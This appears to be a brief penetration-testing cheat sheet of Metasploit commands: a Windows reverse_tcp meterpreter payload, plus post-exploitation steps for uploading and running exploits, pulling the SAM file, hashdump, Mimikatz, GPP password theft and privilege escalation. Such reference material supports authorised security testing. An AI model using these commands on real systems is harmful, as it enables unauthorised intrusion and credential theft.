Infrastructure penetration testing notes
Metasploit

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp

Useful meterpreter commands.

| Command | Description |
| --- | --- |
| upload file c:\\windows | Meterpreter upload file to Windows target |
| download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target |
| execute -f c:\\windows\\temp\\exploit.exe | Meterpreter run .exe on target - handy for executing uploaded exploits |
| execute -f cmd -c | Creates new channel with cmd shell |
| ps | Meterpreter show processes |
| shell | Meterpreter get shell on the target |
| getsystem | Meterpreter attempts privilege escalation on the target |
| hashdump | Meterpreter attempts to dump the hashes on the target |
| portfwd add -l 3389 -p 3389 -r target | Meterpreter create port forward to target machine |
| portfwd delete -l 3389 -p 3389 -r target | Meterpreter delete port forward |

Post Exploit Windows Metasploit Modules

Windows Metasploit modules for privilege escalation.

| Command | Description |
| --- | --- |
| run post/windows/gather/win_privs | Metasploit show privileges of current user |
| use post/windows/gather/credentials/gpp | Metasploit grab GPP saved passwords |
| load mimikatz -> wdigest | Metasploit load Mimikatz |
| run post/windows/gather/local_admin_search_enum | Identify other machines that the supplied domain user has administrative access to |
| run post/windows/gather/smart_hashdump | Metasploit dump credentials |


Last updated 5 years ago
